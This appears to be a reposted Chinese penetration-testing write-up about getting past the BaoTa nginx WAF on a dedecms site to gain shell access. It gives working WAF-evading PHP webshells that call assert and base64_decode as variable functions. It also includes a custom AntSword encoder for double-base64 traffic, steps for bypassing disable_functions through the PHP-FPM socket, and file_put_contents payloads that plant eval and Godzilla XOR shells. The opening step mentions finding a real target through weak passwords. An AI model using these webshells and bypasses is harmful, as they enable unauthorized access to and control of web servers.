晴海小常识分享

晴海小常识分享

当前位置:首页 > 编程笔记 > 正文
已解决

复现 文件上传漏洞bypass

来自网友在路上 176876提问 提问时间:2023-11-08 14:04:23阅读次数: 76

最佳答案 问答题库768位专家为你答疑解惑

1,弱口令发现目标网站,为宝塔搭建的dedecms,于是自己服务器搭建同样的

图片

图片

2 get请求phpinfo() 有waf,上传文件有waf

图片

图片

3,寻找资料,发现是,宝塔的ngix防火墙。同样在自己的服务器上部署成功。顺便还看到了,宝塔的过滤规则。

图片

图片


可以发现, 规则,对get,post ,cookie,等方式的eval,还有base64都进行了过滤

4,过waf的一句话, eval和assert的区别

图片

图片


规则, 对eval( base64( phpinfo( 等过滤了。可以采取字符串拼接的方式。
但是,eval是不能够被拼接的。因为eval()是一个语言构造器,他不能使用PHP提供的可变函数来调用
上代码:

 

  1.  
    <?php
     
  2.  
    $a='assert';
     
  3.  
    $m='base64_decode';
     
  4.  
    $a($m($_REQUEST['z']));
     
 

5,为什么要base64呢?因为蚁剑,和菜刀的流量特征。。里面有base64
 

 

图片
 


 这个就是蚁剑的流量特征。有明显的base64所以直接被过滤掉了。
 通过查资料。知道,1方面要对小马进行base64编码, 另外一方面要对蚁剑进行魔改。小马就是上面的小马了。至于蚁剑的魔改, 直接改配置 。简单来说,就是双base64
 

 

图片
 

 

图片
 

 

  1.  
    'use strict';
     
  2.  
     
  3.  
    module.exports = (pwd, data, ext={}) => {
     
  4.  
    data[pwd] = Buffer.from(data['_']).toString('base64');
     
  5.  
     
  6.  
    delete data['_'];
     
  7.  
     
  8.  
    return data;
     
  9.  
    }
     
 

其实当小马写入进去的时候, 就可以执行了。
 不过传进去的是phpinfo() 的base64编码 . 正好小马是base64decode
 

 

图片
 

6 蚁剑连接成功。
 

当然编码格式得选刚才自己写的编码
 

 

图片
 

 

图片
 

7,但是控制台,不管输入whoami,还是ls ,还是其他命令,全部都是ret=127
 

 

图片
 


 通过查资料知道了。这是phpinfo 里面设置的disable_function 过滤掉了, system函数。
 

 

图片
 

8,于是要绕过disable_function 。
 

1,我先找的资料,是蚁剑的绕过disable_function 。蚁剑有个插件市场有绕过disable_function
 

 

图片
 

 

图片
 


 通过一个个测试, 只有选择fastcgi/php_FPM。并且自己狠狠地恶补了这个知识。大意就是,fastcgi是个解释器,直接修改这个解释器,从而绕过phpinfo的disbale_function .
 

 

图片
 


 千万要注意的是,这个得选择这个。找了好多资料,测试好多次。一直找不到。其他的都不对。
 

 

图片
 


/tmp/php-cgi-70.sock
 

9,蚁剑文件上传成功。
 

 

图片
 

本来到这里就结束了。然后连接.antproxy.php 这个文件, 密码不变。就能够成功连接上。不知道为什么, 我的蚁剑不成功。返回是空, 有知道的大佬, 求知道下
 

 

图片
 

10,由于蚁剑没成功。找了资料说哥斯拉也有绕过disable_function 。于是哥斯拉安排上。成功获得权限www
 

 

图片
 

 

图片
 


 一定要注意FPM/FCGI的地址不能写错
 /tmp/php-cgi-56.sock
 

备注:中间还有一个步骤。那就是, 哥斯拉生产的php小马第一个有base64流量特征,所以穿不进去, 被waf拦截。其他2个php小马没有流量特征是可以用的。但是, 里面有eval函数。于是。我用file_put_contents 写文件, 直接把哥斯拉的小马写进去了。具体参考如下
 

 

图片
 


 一句话:
 

<?php$a=base64_decode($_REQUEST['test']);echo $a;assert($a);
 

poc:
 

$a = "好好学习,天天向上;福如东海,寿比南山";$b = file_put_contents('test.txt', $a);$b = file_put_contents('test.txt','好好学习,天天向上;福如东海,寿比南山');file_put_contents('shell.php','<?php eval($_REQUEST[8]);');//哥斯拉xor一句话file_put_contents('xor.php','<?php<span class="label label-primary">@session_start();#CTL{n}</span><span>@set_time_limit(0);#CTL{n}</span><span>@error_reporting(0);#CTL{n}function</span> encode($D,$K){for($i=0;$i@run($data),$key);#CTL{n}</span> }else{if (strpos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}}');
 

备注:$b的内容进行base64编码
 

 

 
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
 
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
 

 

 

图片
 

没看够~?欢迎关注!
 

 

 

 
 
 
 
 
渗透工具
 
 
技术文档、书籍
 
 
 
 
面试题
 
帮助你在面试中脱颖而出
 
 
视频
 
基础到进阶
 
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
 
 
 
 
应急响应笔记
 
 
学习路线
 
 
 

查看全文

      

      
       
  
       
99%的人还看了

    
  
      
      

          
相似问题

          
      

      

          
猜你感兴趣

          
    
 


      

 
     

          
版权申明

          
本文"复现 文件上传漏洞bypass":http://eshow365.cn/6-35380-0.html
内容来自互联网,请自行判断内容的正确性。如有侵权请联系我们,立即删除!

      

      
    

    

    

      
    

    

  

  

  

    

      
推荐回答

      
    

    
    
    

  







  

    

      
网站内容来自网络,如有侵权请联系我们,立即删除!粤ICP备2023082154号